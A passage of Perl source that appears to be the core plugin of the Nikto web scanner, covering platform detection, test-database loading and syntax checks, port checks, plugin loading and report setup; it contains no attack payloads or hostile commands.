Look for indicators of the platform in the Server header\n        if (   $mark->{'banner'}\n            && $VARIABLES{'@PLATFORMNIX'}\n            && $mark->{'banner'} =~ /$VARIABLES{'@PLATFORMNIX'}/i) {\n            return 'nix';\n        }\n        elsif (   $mark->{'banner'}\n               && $VARIABLES{'@PLATFORMWIN'}\n               && $mark->{'banner'} =~ /$VARIABLES{'@PLATFORMWIN'}/i) {\n            return 'win';\n        }\n\n        # check the response body\n        if ($content && $content =~ /$VARIABLES{'@PLATFORMNIX'}/i) {\n            return 'nix';\n        }\n        elsif ($content && $content =~ /$VARIABLES{'@PLATFORMWIN'}/i) {\n            return 'win';\n        }\n\n        # check the response headers\n        if ($response && ref($response) eq 'HASH') {\n            foreach my $header (keys %$response) {\n                my $value = $response->{$header};\n                next unless defined $value;\n\n                # Check header name\n                if ($header =~ /$VARIABLES{'@PLATFORMNIX'}/i) {\n                    return 'nix';\n                }\n                elsif ($header =~ /$VARIABLES{'@PLATFORMWIN'}/i) {\n                    return 'win';\n                }\n\n                # Check header value (handle arrays)\n                my $header_value = ref($value) eq 'ARRAY' ? join(', ', @$value) : $value;\n                if ($header_value =~ /$VARIABLES{'@PLATFORMNIX'}/i) {\n                    return 'nix';\n                }\n                elsif ($header_value =~ /$VARIABLES{'@PLATFORMWIN'}/i) {\n                    return 'win';\n                }\n            }\n        }\n    }\n\n    return 'all';\n}\n\n###############################################################################\nsub load_databases {\n    my @dbs    = qw/db_useragents db_404_strings  db_outdated  db_variables db_headers_suggested/;\n    my $prefix = $_[0] || '';\n\n    # Only load the right databases if -Userdbs is set\n    if ((defined($CLI{'userdbs'})) && ($CLI{'userdbs'} eq 'all')) {\n        if   ($prefix eq '') { return; }\n        else                 { push(@dbs, 'db_tests'); }\n    }\n    if (($prefix eq 'u') || (!defined($CLI{'userdbs'}))) { push(@dbs, 'db_tests'); }\n\n    # verify required files\n    for my $file (@dbs) {\n        if (!-r \"$CONFIGFILE{'DBDIR'}/$file\") {\n            nprint(\"+ ERROR: Can't find/read required file \\\"$CONFIGFILE{'DBDIR'}/$file\\\"\");\n            exit 1;\n        }\n    }\n\n    for my $file (@dbs) {\n        my $filename = $CONFIGFILE{DBDIR} . \"/\" . $prefix . $file;\n        if (!-r $filename) { next; }\n        nprint(\"- Loading DB: $filename\", \"d\");\n        open(IN, \"<$filename\") || die nprint(\"+ ERROR: Can't open \\\"$filename\\\":$@\\n\");\n\n        # db_tests\n        if ($file =~ /u?db_tests/) { push(@DBFILE, <IN>); next; }\n\n        # all the other files require per-line processing\n        else {\n            my @file;\n\n            # Cleanup\n            while (<IN>) {\n                chomp;\n                $_ =~ s/#.*$//;\n                $_ =~ s/\\s+$//;\n                $_ =~ s/^\\s+//;\n                if ($_ ne \"\") { push(@file, $_); }\n            }\n\n            # db_variables\n            if ($file =~ /u?db_variables/) {\n                foreach my $l (@file) {\n                    if ($l =~ /^@/) {\n                        next if $l eq '';\n                        my @temp = split(/=/, $l, 2);    # Limit to 2 parts to handle = in values\n                        if (   @temp >= 2\n                            && defined($temp[0])\n                            && defined($temp[1])\n                            && $temp[0] ne ''\n                            && $temp[1] ne '') {\n                            $temp[0] =~ s/^\\s+|\\s+$//g;\n                            $VARIABLES{ $temp[0] } = $temp[1];\n                        }\n                    }\n                }\n            }\n\n            # db_headers_suggested\n            elsif ($file =~ /u?db_headers_suggested/) {\n                foreach my $l (@file) {\n                    my @T = parse_csv($l);\n                    next if $T[0] eq '';\n                    $VARIABLES->{'SUGGESTED_HEADERS'}->{ $T[0] } = $T[1];\n                }\n            }\n\n            # db_404_strings\n            elsif ($file =~ /u?db_404_strings/) {\n                foreach my $l (@file) {\n                    if ($l =~ /^\\@CODE=/) {\n                        $l =~ s/^\\@CODE=//;\n                        $l = validate_and_fix_regex($l);\n                        $VARIABLES{'ERRCODES'}->{$l} = 1;\n                    }\n                    else {\n                        $l = validate_and_fix_regex($l);\n                        $VARIABLES{'ERRSTRINGS'}->{$l} = 1;\n                    }\n                }\n            }\n\n            # db_outdated\n            elsif ($file =~ /u?db_outdated/) {\n                foreach my $l (@file) {\n                    my @T = parse_csv($l);\n                    next if $T[1] eq '';\n                    $T[1]                    = validate_and_fix_regex($T[1]);\n                    $OVERS{ $T[1] }{ $T[2] } = $T[3];\n                    $OVERS{ $T[1] }{'tid'}   = $T[0];\n                }\n            }\n\n            # db_useragents\n            elsif ($file =~ /u?db_useragents/) {\n                $VARIABLES{'@USERAGENTS'} = [];\n                foreach my $l (@file) {\n                    next if $l =~ /^\\#/;\n                    next if $l eq '';\n                    $l =~ s/^\\s+//;\n                    $l =~ s/\\s+$//;\n                    push @{ $VARIABLES{'@USERAGENTS'} }, $l;\n                }\n            }\n            close(IN);\n        }\n    }\n\n    return;\n}\n\n###############################################################################\n# Get directory listing\nsub dirlist {\n    my $DIR       = $_[0] || return;\n    my $PATTERN   = $_[1] || \"\";\n    my @FILES_TMP = ();\n\n    opendir(DIRECTORY, $DIR) || die print STDERR \"+ ERROR: Can't open directory '$DIR': $@\";\n    foreach my $file (readdir(DIRECTORY)) {\n        if ($file =~ /^\\./) { next; }    # skip hidden files, '.' and '..'\n        if ($PATTERN ne \"\") {\n            if ($file =~ /$PATTERN/) { push(@FILES_TMP, $file); }\n        }\n        else { push(@FILES_TMP, $file); }\n    }\n    closedir(DIRECTORY);\n\n    return @FILES_TMP;\n}\n###############################################################################\nsub check_dbs {\n    @dbs = dirlist($CONFIGFILE{'DBDIR'}, \"^u?db_*\");\n    my %ALL_IDS;\n\n    for my $file (@dbs) {\n        my $filename = $CONFIGFILE{DBDIR} . \"/\" . $prefix . $file;\n        if (!-r $filename) {\n            nprint(\"+ ERROR: Unable to read \\\"$filename\\\"\");\n            next;\n        }\n        open(IN, \"<$filename\") || die nprint(\"+ ERROR: Can't open \\\"$filename\\\":$@\\n\");\n        nprint(\"Syntax Check: $filename\");\n\n        if ($file =~ /u?db_outdated/) {\n            my $count = 0;\n            my %BANNER;\n            foreach $line (<IN>) {\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#/) { next; }\n                chomp($line);\n                if ($line eq \"\" || $line =~ /\"nikto_id\"/) { next; }\n                $count++;\n                my @L = parse_csv($line);\n                if ($#L ne 3) { nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\"); next; }\n                if (($L[0] ne 0) && exists($ALL_IDS{ $L[0] })) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else { $ALL_IDS{ $L[0] } = 1; }\n                if (exists($BANNER{ $L[1] }) && $L[0] !~ /(600067|600068|601085)/i) {\n                    nprint(\"\\t+ ERROR: Duplicate Server Banner: $line\");\n                    nprint(  \"\\t+ If this expected/needed: Please add the ID $L[0] at line \"\n                           . (__LINE__- 2)\n                           . \" in the nikto_core.plugin.\");\n                }\n                else { $BANNER{ $L[1] } = 1; }\n            }\n            nprint(\"\\t$count entries\");\n        }\n        elsif ($file =~ /u?db_favicon/ || $file =~ /u?db_domino/) {\n            my $counter = 0;\n            my %ENTRY;\n            foreach $line (<IN>) {\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#/) { next; }\n                chomp($line);\n                if ($line eq \"\" || $line =~ /\"nikto_id\"/) { next; }\n                $counter++;\n                my @L = parse_csv($line);\n                if ($#L ne 2) { nprint(\"\\t+ ERROR: Invalid syntax ($#L): $line\"); next; }\n                if (($L[0] ne 0) && exists($ALL_IDS{ $L[0] })) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else { $ALL_IDS{ $L[0] } = 1; }\n                if (exists($ENTRY{ $L[1] })) {\n                    nprint(\"\\t+ ERROR: Duplicate entry: $line\");\n                }\n                else { $ENTRY{ $L[1] } = 1; }\n            }\n            nprint(\"\\t$counter entries\");\n        }\n\n        elsif ($file =~ /u?db_tests/) {\n            my %ENTRIES;\n            foreach my $line (<IN>) {\n                chomp($line);\n                $line =~ s/^\\s+//;\n                if ($line =~ /^\\#|^$/) { next; }\n                my @L = parse_csv($line);\n\n                # Validate field count (should be 9 fields)\n                if ((count_fields($line, 1) ne 8) && (count_fields($line) ne '')) {\n                    nprint(  \"\\t+ ERROR: Invalid syntax - expected 9 fields, got \"\n                           . (scalar(@L))\n                           . \": $line\");\n                    next;\n                }\n\n                # Validate method\n                if (   ($L[4] !~ /(GET|POST|TRACE|TRACK|OPTIONS|SEARCH|INDEX)/i)\n                    && ($L[0] ne '006433')) {\n                    nprint(\"\\t+ ERROR: Possibly invalid method: $L[4] on ($line)\");\n                }\n\n                # Validate DSL field is not empty\n                if ($L[5] eq \"\") {\n                    nprint(\"\\t+ ERROR: blank DSL field: $line\");\n                    next;\n                }\n\n                # Validate DSL syntax\n                my $dsl_to_validate = $L[5];\n                if (defined $dsl_to_validate && length $dsl_to_validate) {\n\n        # Expand @LFI() placeholder before validation, since it needs to be expanded to be valid DSL\n                    $dsl_to_validate = expand_lfi_dsl($dsl_to_validate);\n\n                    if (defined $dsl_to_validate && length $dsl_to_validate) {\n                        eval { parse_dsl($dsl_to_validate); };\n                        if ($@) {\n                            nprint(\n                                \"\\t+ ERROR: Invalid DSL syntax in test $L[0] field 5: \\\"$L[5]\\\", error: $@\"\n                                );\n                        }\n                    }\n                    else {\n                        nprint(\"\\t+ ERROR: Empty DSL field test $L[0]\");\n                    }\n                }\n\n                # Validate URI format\n                if (($L[3] =~ /^\\@CG/) && ($L[3] !~ /^\\@CGIDIRS/)) {\n                    nprint(\"\\t+ ERROR: Possible \\@CGIDIRS misspelling: $line\");\n                }\n                if ($L[3] =~ /[\\s]/) {\n                    nprint(\"\\t+ ERROR: space in file portion test #$L[0]: '$L[3]'\");\n                }\n\n                # Validate CSV format\n                if ($line =~ /[^\\\\]\"\\s/) {\n                    nprint(\"\\t+ ERROR: space after quote #$L[0]: $line\");\n                }\n                if ($line =~ /\\s\"/) {\n                    nprint(\"\\t+ ERROR: space before quote #$L[0]: $line\");\n                }\n\n                # Check for duplicate entries\n                $ENTRIES{\"$L[3],$L[4],$L[5],$L[6],$L[7],$L[8]\"}++;\n\n                # Validate Test ID\n                if (($L[0] ne 0) && exists($ALL_IDS{ $L[0] })) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $L[0]\");\n                }\n                else {\n                    $ALL_IDS{ $L[0] } = 1;\n                }\n\n                # Validate Tuning Type\n                if ($L[2] eq \"\" || $L[2] =~ /[^a-f0-9]/) {\n                    nprint(\"\\t+ ERROR: Invalid Tuning Type: $line\");\n                }\n\n                # Validate URI patterns\n                if (   $L[3] =~ '^(/@(?!JUNK)|//)'\n                    && $L[0] !~\n                    /(000396|000447|000543|000544|000545|000928|000929|001208|001373|001497|002761|002762|003029|007152)/i\n                    ) {\n                    nprint(\"\\t+ ERROR: Possible incorrect slashes: $line\");\n                    nprint(\n                        \"\\t+ If two or more slashes are needed for this test: Please add the ID $L[0] at line \"\n                          . (__LINE__- 2)\n                          . \" in the nikto_core.plugin.\");\n                }\n                if ($L[3] =~ '^@(?!JUNK)[A-Z]+/' && $L[0] !~ /(003348|003349)/i) {\n                    nprint(\"\\t+ ERROR: Possible incorrect slash after \\@VARIABLE: $line\");\n                    nprint(\n                        \"\\t+ If this slash is needed for this test: Please add the ID $L[0] at line \"\n                          . (__LINE__- 2)\n                          . \" in the nikto_core.plugin.\");\n                }\n\n                # Validate POST data usage\n                if ((($L[4] ne 'POST') && ($L[4] ne 'SEARCH')) && ($L[7] ne '')) {\n\n                    # Some test IDs need this\n                    if ($L[0] !~ /(006992|000126|000291|001153)/i) {\n                        nprint(\n                            \"\\t+ ERROR: Possible incorrect use of POST data without POST method on line: $line\"\n                            );\n                        nprint(\n                            \"\\t+ If the POST data is needed for this test: Please add the ID $L[0] at line \"\n                              . (__LINE__- 2)\n                              . \" in the nikto_core.plugin.\");\n                    }\n                }\n            }\n            foreach $entry (keys %ENTRIES) {\n                if ($ENTRIES{$entry} > 1) {\n                    nprint(\"\\t+ ERROR: Duplicate Check Syntax ($ENTRIES{$entry}): $entry\");\n                }\n            }\n            nprint(\"\\t\" . keys(%ENTRIES) . \" entries\");\n        }\n        elsif ($file =~ /u?db_variables/) {\n            my $ctr = 0;\n            foreach $line (<IN>) {\n                if ($line !~ /^\\@/)         { next; }\n                if ($line !~ /^\\@.+\\=.+$/i) { nprint(\"\\t+ ERROR: Invalid syntax: $line\"); }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_404_strings/ || $file =~ /u?db_dictionary/) {\n            my $ctr = 1;\n            my %STRINGS;\n            foreach $line (<IN>) {\n                chomp($line);\n                $line =~ s/\\#.*$//;\n                next if $line eq '';\n                my ($result, $bad) = validate_and_fix_regex($line, 1);\n                if ($bad) { nprint(\"\\t+ ERROR: Invalid regex on line $ctr: \\\"$line\\\"\"); }\n                if (exists($STRINGS{$line})) {\n                    nprint(\"\\t+ ERROR: Duplicate String: $line\");\n                }\n                else { $STRINGS{$line} = 1; }\n                $ctr++;\n            }\n            $ctr--;\n            nprint(\"\\t$ctr entries\");\n        }\n\n        elsif ($file =~ /u?db_headers_suggested/) {\n            my $ctr = 0;\n            my %HEADERS;\n            foreach $line (<IN>) {\n                chomp($line);\n                $line =~ s/\\#.*$//;\n                next if $line eq '';\n                my @fields = parse_csv($line);\n\n                # Skip header line if present\n                if ($fields[0] =~ /^header$/i) { next; }\n                if (scalar(@fields) != 2) {\n                    nprint(\"\\t+ ERROR: Invalid syntax (expected 2 fields): $line\");\n                }\n                if (exists($HEADERS{ $fields[0] })) {\n                    nprint(\"\\t+ ERROR: Duplicate Header: $fields[0]\");\n                }\n                else {\n                    $HEADERS{ $fields[0] } = 1;\n                }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_headers_common/) {\n            my $ctr = 0;\n            my %HEADERS;\n            foreach $line (<IN>) {\n                chomp($line);\n                $line =~ s/\\#.*$//;\n                next if $line eq '';\n                if ((count_fields($line) ne 0) && (count_fields($line) ne '')) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n                if (exists($HEADERS{$line})) {\n                    nprint(\"\\t+ ERROR: Duplicate Header: $line\");\n                }\n                else { $HEADERS{$line} = 1; }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_multiple_index/) {\n            my $ctr = 0;\n            foreach $line (<IN>) {\n                if ((count_fields($line) ne 0) && (count_fields($line) ne '')) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        elsif ($file =~ /u?db_useragents/) {\n            my $ctr = 0;\n            foreach $line (<IN>) {\n                chomp($line);\n                next if $line =~ /^\\#/;\n                next if $line eq '';\n                if ($line !~ /^\\\"[^\"]+\\\"/) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n        else {\n            # It's a file of standard DB type, we can do this intelligently\n            my (@headers, @regex_fields);\n            my $ctr = 0, $fields = 0;\n            foreach $line (<IN>) {\n                $line =~ s/^#.*//;\n                next if $line eq \"\";\n\n                # first, grab the headers\n                if ($fields == 0) {\n                    @headers = parse_csv($line);\n                    $fields  = $#headers;\n\n                    # check regex fields for syntax\n                    for (my $i = 0 ; $i <= $#headers ; $i++) {\n                        if (   ($headers[$i] eq 'match')\n                            || ($headers[$i] eq 'matchstring')\n                            || ($headers[$i] eq 'server')) {\n                            push(@regex_fields, $i);\n                        }\n                    }\n                    next;\n                }\n\n                chomp($line);\n                next if $line eq \"\";\n                my @entry = parse_csv($line);\n                if ($regex_fields[0] ne '') {\n                    foreach my $f (@regex_fields) {\n                        my ($result, $bad) = validate_and_fix_regex($entry[$f], 1);\n                        if ($bad) {\n                            nprint(\"\\t+ ERROR: Invalid regex in field $f on line $ctr: \\\"$line\\\"\");\n                        }\n                    }\n                }\n\n                if (   (count_fields($line, 1) != $fields - 1)\n                    && (count_fields($line) ne '')) {\n                    nprint(\"\\t+ ERROR: Invalid syntax: $line\");\n                }\n\n                if (($entry[0] ne 0) && exists($ALL_IDS{ $entry[0] })) {\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $entry[0]\");\n                }\n                else { $ALL_IDS{ $entry[0] } = 1; }\n\n                $ctr++;\n            }\n            nprint(\"\\t$ctr entries\");\n        }\n\n        close(IN);\n    }\n\n    # Try to grab the test IDs from plugins to check for duplicates. Not foolproof.\n    nprint(\"Checking plugins for duplicate test IDs\");\n    my $found      = 0;\n    my @pluginlist = dirlist(\"$CONFIGFILE{'PLUGINDIR'}\", '\\.plugin$');\n    foreach my $pf (@pluginlist) {\n        open(PF, \"<$CONFIGFILE{'PLUGINDIR'}/$pf\")\n          || die print STDERR \"+ ERROR: Unable to open '$pf': $@\\n\";\n        my @file = <PF>;\n        close(PF);\n        my @adds = grep(/add_vulnerability\\(/, @file);\n        foreach my $addv (@adds) {\n            chomp($addv);\n            my @bits = parse_csv($addv);\n            $bits[2] =~ s/\\s+//g;\n            $bits[2] =~ s/\\\"//g;\n            if ($bits[2] =~ /^[\\d]+$/) {\n                if (($bits[2] ne 0) && exists($ALL_IDS{ $bits[2] })) {\n                    $found++;\n                    nprint(\"\\t+ ERROR: Duplicate Test ID: $bits[2]\");\n                }\n                else { $ALL_IDS{ $bits[2] } = 1; }\n            }\n        }\n    }\n    nprint(\"\\t$found entries\");\n\n    # Bad practice here but this one won't parse right above ¯\\_(ツ)_/¯\n    $ALL_IDS{'000137'} = 1;    # TLS issues\n\n    # Look for bad/invalid IDs\n    foreach my $id (keys %ALL_IDS) {\n        chomp($id);\n        next if (($id eq 0) || ($id eq '') || ($id eq 'nikto_id'));\n        if ($id =~ /[^\\d]/)  { nprint(\"+ ERROR: Invalid test ID: $id\"); next; }\n        if (length($id) < 6) { nprint(\"+WARNING: Possibly invalid test ID: $id\"); }\n    }\n\n    # Suggest some open IDs\n    my @open;\n    my $id   = '000001';\n    while ($#open < 6) {\n        if (!exists($ALL_IDS{$id})) { push(@open, $id); }\n        $id++;\n    }\n    nprint(\"\\nSome (probably) open IDs: \" . join(\", \", @open));\n\n    nprint(\"\\n\");\n    exit 1;\n}\n\n###############################################################################\nsub count_fields {\n    my $line    = $_[0] || return;\n    my $checkid = $_[1] || 0;\n    if ($line !~ /^\\\"/) { return; }\n    chomp($line);\n    $line =~ s/\\s+$//;\n    if ($line eq '') { return; }\n    my @L = parse_csv($line);\n    if ($checkid && ($L[0] ne 'nikto_id') && (($L[0] =~ /[^0-9]/) || ($L[0] eq ''))) { return -1; }\n    return $#L;\n}\n\n###############################################################################\nsub port_check {\n    my ($start_time, $hostname, $ip, $port, $key, $cert, $vhost) = @_;\n    my $m = {};\n\n    $m->{'start_time'} = $start_time;\n    $m->{'hostname'}   = $vhost || $hostname;\n    $m->{'ip'}         = $ip;\n    $m->{'port'}       = $port;\n    $m->{'ssl'}        = 0;\n\n    my @checktypes;\n    if    ($CLI{'nossl'})                            { @checktypes = ('HTTP'); }\n    elsif ($CLI{'ssl'} || $CLI{'host'} =~ /^https/i) { @checktypes = ('HTTPS'); }\n    else                                             { @checktypes = ('HTTP', 'HTTPS'); }\n\n    foreach my $method (split(/ /, $CONFIGFILE{'CHECKMETHODS'})) {\n        $request{'whisker'}->{'method'} = $method;\n        foreach my $checkssl (@checktypes) {\n            nprint(\"- Checking for $checkssl on \"\n                     . ($m->{'hostname'} || $m->{'ip'})\n                     . \":$port, using $method\",\n                   \"v\",\n                   \"CheckSSL\",\n                   ($m->{'hostname'}, $m->{'ip'}, $m->{'displayname'})\n                   );\n            $m->{ssl} = ($checkssl eq \"HTTP\") ? 0 : 1;\n            if ($m->{'ssl'}) {\n                $m->{'key'}  = $key;\n                $m->{'cert'} = $cert;\n            }\n            proxy_check($m);\n            my ($res, $content, $error, $request, $response) =\n              nfetch($m, \"/\", $method, \"\", \"\", { noerror => 1, noprefetch => 1, nopostfetch => 1 },\n                     \"PortCheck\");\n\n            if ($res) {\n\n                # Some Apache servers are annoying and answer non-TLS requests on a TLS server.\n                if (defined $content\n                    && ($content =~ /plain HTTP (?:to an SSL|request was sent to HTTPS)/)) {\n                    dump_var(\"Result Hash\", \\%result,\n                             ($m->{'hostname'}, $m->{'ip'}, $m->{'displayname'}));\n                    next;\n                }\n                nprint(\"- $checkssl server found: \"\n                         . ($m->{'hostname'} || $m->{'ip'})\n                         . \":$port \\t$response->{server}\",\n                       \"d\",\n                       ($m->{'hostname'}, $m->{'ip'}, $m->{'displayname'})\n                       );\n                return $m->{'ssl'} + 1;\n            }\n        }\n    }\n\n    my $msg = \"Unable to connect to \" . ($hostname || $ip) . \":$port\";\n    if ($CLI{'ipv6'}) {\n        $msg .=\n          \". Ensure you have IPv6 connectivity. Trying running Nikto with the '-check6' flag.\";\n    }\n\n    nprint($VARIABLES{'DIV'});\n    return $msg;\n}\n\n###############################################################################\nsub load_plugins {\n    my @pluginlist = dirlist(\"$CONFIGFILE{'PLUGINDIR'}\", '\\.plugin$');\n    my @all_names;\n\n    # populate plugin macros\n    $CONFIGFILE{'@@NONE'} = \"\";\n\n    # Check if running plugins is NONE - if so, don't bother initializing plugins\n    if ($CLI{'plugins'} eq '@@NONE') {\n        return;\n    }\n\n    foreach my $plugin (@pluginlist) {\n        my $plugin_name = $plugin;\n        $plugin_name =~ s/\\.plugin$//;\n        my $plugin_init = $plugin_name . \"_init\";\n        eval { require \"$CONFIGFILE{'PLUGINDIR'}/$plugin\"; };\n        if ($@) {\n            nprint(\"- Could not load or parse plugin: $plugin_name\\n Error: \");\n            warn $@;\n            nprint(\"- The plugin could not be run.\");\n        }\n        else {\n            nprint(\"- Initializing plugin $plugin_name\", \"v\", \"Init\");\n\n            # Call initialisation method\n            if (defined &$plugin_init) {\n                my $pluginhash = &$plugin_init;\n\n                # Add default weights if not already assigned\n                while (my ($hook, $hook_params) = each(%{ $pluginhash->{'hooks'} })) {\n                    $hook_params->{$hook}->{'weight'} = 50\n                      unless (defined $hook_params->{$hook}->{'weight'});\n                }\n                $pluginhash->{report_weight} = 50 unless (defined $pluginhash->{report_weight});\n                push(@all_names, $pluginhash->{name});\n\n                push(@PLUGINS, $pluginhash);\n                nprint(\"- Loaded \\\"$pluginhash->{full_name}\\\" plugin.\", \"v\", \"Init\");\n            }\n            else {\n                nprint(\"WARNING: No init found for $plugin_name\\n\", \"d\");\n            }\n        }\n    }\n    $CONFIGFILE{'@@ALL'} = join(';', @all_names);\n    my @torun = split(/;/, expand_pluginlist($CLI{'plugins'}, 0));\n\n    # Force-enable report plugins if needed\n    if ($CLI{'plugins'} =~ /\\@NONE/ && defined $CLI{'formats'} && ref($CLI{'formats'}) eq 'ARRAY') {\n        my %format_map = ('csv'  => 'report_csv',\n                          'json' => 'report_json',\n                          'htm'  => 'report_html',\n                          'html' => 'report_html',\n                          'sql'  => 'report_sqlg',\n                          'sqld' => 'report_sqld',\n                          'txt'  => 'report_text',\n                          'xml'  => 'report_xml'\n                          );\n\n        foreach my $fmt (@{ $CLI{'formats'} }) {\n            if (exists $format_map{$fmt}) {\n                push(@torun, $format_map{$fmt}) unless grep { $_ eq $format_map{$fmt} } @torun;\n            }\n        }\n    }\n\n    # Second pass to ensure that @@ALL is configured\n    foreach my $plugin (@PLUGINS) {\n\n        # Check that the plugin is to be run\n        # Perl doesn't allow us to use \"in\", pity\n        foreach my $torun_plugin (@torun) {\n            next if ($torun_plugin eq \"\");\n\n            # split up into parameters\n            my $name = my $suffix = $torun_plugin;\n            if ($torun_plugin =~ /\\(/) {\n                $name   =~ s/(.*)(\\(.*\\))/$1/;\n                $suffix =~ s/(.*)(\\(.*\\))/$2/;\n            }\n            else {\n                $name   = $torun_plugin;\n                $suffix = \"\";\n            }\n            if ($plugin->{'name'} =~ /$name/i) {\n                $plugin->{'run'} = 1;\n\n                # Create parameters\n                if ($suffix ne \"\") {\n                    my $parameters = {};\n                    $suffix =~ s/(\\()(.*[^\\)])(\\)?)/$2/;\n                    foreach my $parameter (split(/,/, $suffix)) {\n                        if ($parameter !~ /:/) {\n                            $parameters->{$parameter} = 1;\n                        }\n                        else {\n                            my $key = my $value = $parameter;\n                            $key   =~ s/:.*//;\n                            $value =~ s/.*://;\n                            $parameters->{$key} = $value;\n                        }\n                    }\n                    $plugin->{'parameters'} = $parameters;\n                }\n            }\n        }\n    }\n\n    # first build a temporary hash of all known hooks\n    my %hooks;\n    foreach my $plugin (@PLUGINS) {\n        foreach my $hook (keys(%{ $plugin->{'hooks'} })) {\n            $hooks{$hook} = ();\n        }\n    }\n\n    # now we know the types of hooks, look through each plugin for them\n    foreach my $hook (keys(%hooks)) {\n        foreach my $plugin (@PLUGINS) {\n            if ($plugin->{'run'} == 1) {\n                if (defined $plugin->{'hooks'}->{$hook}->{'method'}) {\n                    push(@{ $hooks{$hook} }, $plugin);\n                }\n            }\n        }\n    }\n\n    # Now sort each array by weight\n    foreach my $hook (keys(%hooks)) {\n        my @sorted =\n          sort { $a->{'hooks'}->{$hook}->{'weight'} <=> $b->{'hooks'}->{$hook}->{'weight'} }\n          @{ $hooks{$hook} };\n        $PLUGINORDER{$hook} = \\@sorted;\n    }\n}\n\n###############################################################################\nsub run_hooks {\n    my ($mark, $type, $request, $response) = @_;\n\n    # Cache plugin array reference to avoid repeated hash access\n    my $plugins = $PLUGINORDER{$type};\n    return ($request, $response) unless $plugins;\n\n    foreach my $plugin (@$plugins) {\n        return ($request, $response) if $mark->{'terminate'};\n\n        # Cache hook reference to avoid repeated hash access\n        my $hook = $plugin->{'hooks'}->{$type};\n        next unless $hook;\n\n        # Check conditionals more efficiently\n        my $run = 1;\n        if (my $condition = $hook->{'cond'}) {\n            $run = eval($condition);\n            next unless $run;\n        }\n\n        # Cache plugin parameters and full_name\n        my $parameters = $plugin->{'parameters'};\n        my $full_name  = $plugin->{'full_name'};\n\n        # Save current output states\n        my $oldverbose = $OUTPUT{'verbose'};\n        my $olddebug   = $OUTPUT{'debug'};\n        my $olderrors  = $OUTPUT{'errors'};\n\n        # Set output flags based on parameters\n        $OUTPUT{'verbose'} = 1 if $parameters && $parameters->{'verbose'} == 1;\n        $OUTPUT{'debug'}   = 1 if $parameters && $parameters->{'debug'} == 1;\n\n        # Print status unless it's a prefetch/postfetch hook\n        unless ($type eq \"prefetch\" || $type eq \"postfetch\") {\n            nprint(\"- Running $type for \\\"$full_name\\\" plugin\", \"v\", \"Plugins\");\n            $NIKTO{'current_plugin'} = $full_name;\n        }\n\n        # Execute the hook method\n        &{ $hook->{'method'} }($mark, $parameters, $request, $response);\n\n        # Restore output states\n        $OUTPUT{'verbose'} = $oldverbose;\n        $OUTPUT{'debug'}   = $olddebug;\n        $OUTPUT{'errors'}  = $olderrors;\n    }\n\n    return ($request, $response);\n}\n\n###############################################################################\nsub report_head {\n\n    # Support multiple formats: use formats array\n    my @formats_to_process = ();\n    my %files_to_process   = ();\n\n    if (defined $CLI{'formats'} && ref($CLI{'formats'}) eq 'ARRAY' && @{ $CLI{'formats'} } > 0) {\n\n        # Multiple formats from comma-separated list\n        @formats_to_process = @{ $CLI{'formats'} };\n        if (defined $CLI{'files'} && ref($CLI{'files'}) eq 'HASH') {\n            %files_to_process = %{ $CLI{'files'} };\n        }\n    }\n    else {\n        # Fallback: no formats specified (should not happen, but handle gracefully)\n        nprint(\"+ WARNING: No formats specified for reporting\", \"v\", \"Reports\");\n        return;\n    }\n\n    nprint(\"- Opening reports (\" . join(',', @formats_to_process) . \")\", \"v\", \"Reports\");\n\n    # Process each format separately to ensure unique handles\n    foreach my $format_to_use (@formats_to_process) {\n        my $file_to_use = $files_to_process{$format_to_use} || '';\n\n        # Skip file-based formats that don't have a file (unless sqld/none)\n        if ($file_to_use eq '' && $format_to_use ne 'none' && $format_to_use ne 'sqld') {\n            nprint(\"+ ERROR: No file specified for format: $format_to_use\", \"v\", \"Reports\");\n            next;\n        }\n\n        foreach my $i (1 .. 100) {\n            foreach my $plugin (@PLUGINS) {\n                if (   $plugin->{run}\n                    && defined $plugin->{report_item}\n                    && $plugin->{report_weight} == $i) {\n                    my $run = 1;\n\n                    # Check if this plugin handles this format\n                    if (defined $plugin->{report_format}) {\n                        $run = ($format_to_use eq $plugin->{report_format});\n                    }\n\n                    if ($run) {\n                        nprint(\n                            \"- Opening report for \\\"$plugin->{full_name}\\\" plugin ($format_to_use) -> $file_to_use\",\n                            \"v\", \"Reports\"\n                            );\n                        my $handle;\n                        if (defined $plugin->{report_head}) {\n\n                            # Each plugin gets its own unique lexical handle\n                            $handle = &{ $plugin->{report_head} }($file_to_use);\n\n                            # Ensure autoflush is enabled (already done in plugin, but double-check)\n                            if (defined $handle && ref($handle) eq 'GLOB') {\n                                $handle->autoflush(1);\n                            }\n                        }\n\n                        # Store this report entry with its unique handle\n                        my $report_entry = {\n                                 host_start => $plugin->{report_host_start},\n                                 host_end   => $plugin->{report_host_end},\n                                 item       => $plugin->{report_item},\n                                 close      => $plugin->{report_close},\n                                 summary    => $plugin->{report_summary},\n                                 ssl_info   => $plugin->{report_ssl_info},     # SSL info hook\n                                 handle     => $handle,\n                                 format     => $format_to_use,                 # Store for debugging\n                                 file       => $file_to_use,                   # Store for debugging\n                                 };\n\n                        push(@REPORTS, $report_entry);\n                    }\n                }\n            }\n        }\n    }\n    return;\n}\n\n###############################################################################\n# Generate scanid for SQL reporting\n# Format: MD5 hash of \"protocol://hostname:port/timestamp\"\n# Example: LW2::md5(\"https://example.com:443/2025:12:16:03:30:44GMT\")\nsub generate_scanid {\n    my ($mark) = @_;\n\n    # Determine protocol\n    my $protocol = 